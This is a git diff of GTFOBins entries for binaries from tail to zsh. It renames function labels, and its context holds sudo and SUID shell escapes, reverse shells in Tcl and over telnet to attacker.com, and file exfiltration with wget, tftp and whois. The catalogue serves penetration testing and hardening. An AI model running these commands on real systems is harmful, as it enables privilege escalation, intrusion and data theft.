b/_gtfobins/tail.md index 0235e3a..7ff0f76 100644 --- a/_gtfobins/tail.md +++ b/_gtfobins/tail.md @@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read tail -c1G "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./tail -c1G "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo tail -c1G "$LFILE" diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md index 1cf26dd..43e701a 100644 --- a/_gtfobins/tar.md +++ b/_gtfobins/tar.md @@ -1,8 +1,8 @@ --- functions: - execute-interactive: + shell: - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - execute-non-interactive: + command: - description: This only works for GNU tar. code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"' file-write: @@ -17,8 +17,8 @@ functions: code: | LFILE=file_to_read tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' - sudo-enabled: + sudo: - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - suid-limited: + limited-suid: - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh --- diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md index 4f3d474..b1fe484 100644 --- a/_gtfobins/taskset.md +++ b/_gtfobins/taskset.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: taskset 1 /bin/sh - suid-enabled: + suid: - code: ./taskset 1 /bin/sh -p - sudo-enabled: + sudo: - code: sudo taskset 1 /bin/sh --- diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md index db81e7f..6db0c67 100644 --- a/_gtfobins/tclsh.md +++ b/_gtfobins/tclsh.md @@ -1,20 +1,20 @@ --- functions: - execute-interactive: + shell: - code: | tclsh exec /bin/sh <@stdin >@stdout 2>@stderr - reverse-shell-non-interactive: + non-interactive-reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh - suid-enabled: + suid: - code: | ./tclsh exec /bin/sh -p <@stdin >@stdout 2>@stderr - sudo-enabled: + sudo: - code: | sudo tclsh exec /bin/sh <@stdin >@stdout 2>@stderr diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md index 3048056..2b9cd53 100644 --- a/_gtfobins/tcpdump.md +++ b/_gtfobins/tcpdump.md @@ -1,14 +1,14 @@ --- description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background. functions: - execute-non-interactive: + command: - code: | COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF - sudo-enabled: + sudo: - code: | COMMAND='id' TF=$(mktemp) diff --git a/_gtfobins/tee.md b/_gtfobins/tee.md index cee23f4..cec5767 100644 --- a/_gtfobins/tee.md +++ b/_gtfobins/tee.md @@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_write echo DATA | ./tee -a "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_write echo DATA | ./tee -a "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_write echo DATA | sudo tee -a "$LFILE" diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md index b0065a0..36055c4 100644 --- a/_gtfobins/telnet.md +++ b/_gtfobins/telnet.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - description: BSD version only. Needs to be connected first. code: | RHOST=attacker.com @@ -8,14 +8,14 @@ functions: telnet $RHOST $RPORT ^] !/bin/sh - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345 TF=$(mktemp -u) mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF - sudo-enabled: + sudo: - description: BSD version only. Needs to be connected first. code: | RHOST=attacker.com @@ -23,7 +23,7 @@ functions: sudo telnet $RHOST $RPORT ^] !/bin/sh - suid-limited: + limited-suid: - description: BSD version only. Needs to be connected first. code: | RHOST=attacker.com diff --git a/_gtfobins/tftp.md b/_gtfobins/tftp.md index d47af31..1186c87 100644 --- a/_gtfobins/tftp.md +++ b/_gtfobins/tftp.md @@ -1,24 +1,24 @@ --- functions: - upload: + file-upload: - description: Send local file to a TFTP server. code: | RHOST=attacker.com tftp $RHOST put file_to_send - download: + file-download: - description: Fetch a remote file from a TFTP server. code: | RHOST=attacker.com tftp $RHOST get file_to_get - suid-enabled: + suid: - description: Send local file to a TFTP server. code: | RHOST=attacker.com ./tftp $RHOST put file_to_send - sudo-enabled: + sudo: - description: Send local file to a TFTP server. code: | RHOST=attacker.com diff --git a/_gtfobins/time.md b/_gtfobins/time.md index 2434124..302b20b 100644 --- a/_gtfobins/time.md +++ b/_gtfobins/time.md @@ -1,10 +1,10 @@ --- description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path. functions: - execute-interactive: + shell: - code: /usr/bin/time /bin/sh - suid-enabled: + suid: - code: ./time /bin/sh -p - sudo-enabled: + sudo: - code: sudo /usr/bin/time /bin/sh --- diff --git a/_gtfobins/timeout.md b/_gtfobins/timeout.md index 565e594..690eed4 100644 --- a/_gtfobins/timeout.md +++ b/_gtfobins/timeout.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: timeout 7d /bin/sh - suid-enabled: + suid: - code: ./timeout 7d /bin/sh -p - sudo-enabled: + sudo: - code: sudo timeout --foreground 7d /bin/sh --- diff --git a/_gtfobins/ul.md b/_gtfobins/ul.md index 06462f9..7f36306 100644 --- a/_gtfobins/ul.md +++ b/_gtfobins/ul.md @@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_read ul "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./ul "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo ul "$LFILE" diff --git a/_gtfobins/unexpand.md b/_gtfobins/unexpand.md index 67efcb3..c538795 100644 --- a/_gtfobins/unexpand.md +++ b/_gtfobins/unexpand.md @@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read unexpand -t99999999 "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./unexpand -t99999999 "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo unexpand -t99999999 "$LFILE" diff --git a/_gtfobins/uniq.md b/_gtfobins/uniq.md index 04cfdc5..f3f102f 100644 --- a/_gtfobins/uniq.md +++ b/_gtfobins/uniq.md @@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_read uniq "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./uniq "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo uniq "$LFILE" diff --git a/_gtfobins/unshare.md b/_gtfobins/unshare.md index e0396bb..86247de 100644 --- a/_gtfobins/unshare.md +++ b/_gtfobins/unshare.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: unshare /bin/sh - suid-enabled: + suid: - code: ./unshare -r /bin/sh - sudo-enabled: + sudo: - code: sudo unshare /bin/sh --- diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md index 32842f6..a032968 100644 --- a/_gtfobins/vi.md +++ b/_gtfobins/vi.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: vi -c ':!/bin/sh' - code: | vi @@ -14,8 +14,8 @@ functions: w file-read: - code: vi file_to_read - suid-enabled: + suid: - code: ./vi -c ':!/bin/sh -p' - sudo-enabled: + sudo: - code: sudo vi -c ':!/bin/sh' --- diff --git a/_gtfobins/vim.md b/_gtfobins/vim.md index c2328e0..23b6a63 100644 --- a/_gtfobins/vim.md +++ b/_gtfobins/vim.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: vim -c ':!/bin/sh' - code: | vim @@ -14,8 +14,8 @@ functions: w file-read: - code: vim file_to_read - suid-enabled: + suid: - code: ./vim -c ':!/bin/sh -p' - sudo-enabled: + sudo: - code: sudo vim -c ':!/bin/sh' --- diff --git a/_gtfobins/watch.md b/_gtfobins/watch.md index d6bdc8e..8152181 100644 --- a/_gtfobins/watch.md +++ b/_gtfobins/watch.md @@ -1,12 +1,12 @@ --- functions: - execute-interactive: + shell: - code: watch -x sh -c 'reset; exec sh 1>&0 2>&0' - suid-enabled: + suid: - description: This keeps the SUID privileges only if the `-x` option is present. code: ./watch -x sh -c 'reset; exec sh 1>&0 2>&0' - sudo-enabled: + sudo: - code: sudo watch -x sh -c 'reset; exec sh 1>&0 2>&0' - suid-limited: + limited-suid: - code: ./watch 'reset; exec sh 1>&0 2>&0' --- diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md index e50d330..b15644a 100644 --- a/_gtfobins/wget.md +++ b/_gtfobins/wget.md @@ -1,24 +1,24 @@ --- functions: - upload: + file-upload: - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data. code: | export URL=http://attacker.com/ export LFILE=file_to_send wget --post-file=$LFILE $URL - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get export LFILE=file_to_save wget $URL -O $LFILE - suid-enabled: + suid: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get export LFILE=file_to_save ./wget $URL -O $LFILE - sudo-enabled: + sudo: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get diff --git a/_gtfobins/whois.md b/_gtfobins/whois.md index f0e0d21..f46e652 100644 --- a/_gtfobins/whois.md +++ b/_gtfobins/whois.md @@ -2,7 +2,7 @@ description: | `whois` hangs waiting for the remote peer to close the socket. functions: - upload: + file-upload: - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments. code: | RHOST=attacker.com @@ -15,7 +15,7 @@ functions: RPORT=12345 LFILE=file_to_send whois -h $RHOST -p $RPORT "`base64 $LFILE`" - download: + file-download: - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped. code: | RHOST=attacker.com diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md index 47fdba1..173ef45 100644 --- a/_gtfobins/wish.md +++ b/_gtfobins/wish.md @@ -1,16 +1,16 @@ --- functions: - execute-interactive: + shell: - code: | wish exec /bin/sh <@stdin >@stdout 2>@stderr - reverse-shell-non-interactive: + non-interactive-reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish - sudo-enabled: + sudo: - code: | sudo wish exec /bin/sh <@stdin >@stdout 2>@stderr diff --git a/_gtfobins/xargs.md b/_gtfobins/xargs.md index 0cfd581..e50b1cb 100644 --- a/_gtfobins/xargs.md +++ b/_gtfobins/xargs.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - description: GNU version only. code: xargs -a /dev/null sh - code: echo x | xargs -Iy sh -c 'exec sh 0<&1' @@ -13,10 +13,10 @@ functions: code: | LFILE=file_to_read xargs -a "$LFILE" -0 - suid-enabled: + suid: - description: GNU version only. code: ./xargs -a /dev/null sh -p - sudo-enabled: + sudo: - description: GNU version only. code: sudo xargs -a /dev/null sh --- diff --git a/_gtfobins/xxd.md b/_gtfobins/xxd.md index 3ef9d4a..613bc0c 100644 --- a/_gtfobins/xxd.md +++ b/_gtfobins/xxd.md @@ -8,11 +8,11 @@ functions: - code: | LFILE=file_to_read xxd "$LFILE" | xxd -r - suid-enabled: + suid: - code: | LFILE=file_to_read ./xxd "$LFILE" | xxd -r - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo xxd "$LFILE" | xxd -r diff --git a/_gtfobins/zip.md b/_gtfobins/zip.md index 758c11b..dd0b23e 100644 --- a/_gtfobins/zip.md +++ b/_gtfobins/zip.md @@ -1,16 +1,16 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp -u) zip $TF /etc/hosts -T -TT 'sh #' rm $TF - sudo-enabled: + sudo: - code: | TF=$(mktemp -u) sudo zip $TF /etc/hosts -T -TT 'sh #' sudo rm $TF - suid-limited: + limited-suid: - code: | TF=$(mktemp -u) ./zip $TF /etc/hosts -T -TT 'sh #' diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md index 59dbcb0..fad95bb 100644 --- a/_gtfobins/zsh.md +++ b/_gtfobins/zsh.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: zsh - suid-enabled: + suid: - code: ./zsh - sudo-enabled: + sudo: - code: sudo zsh ---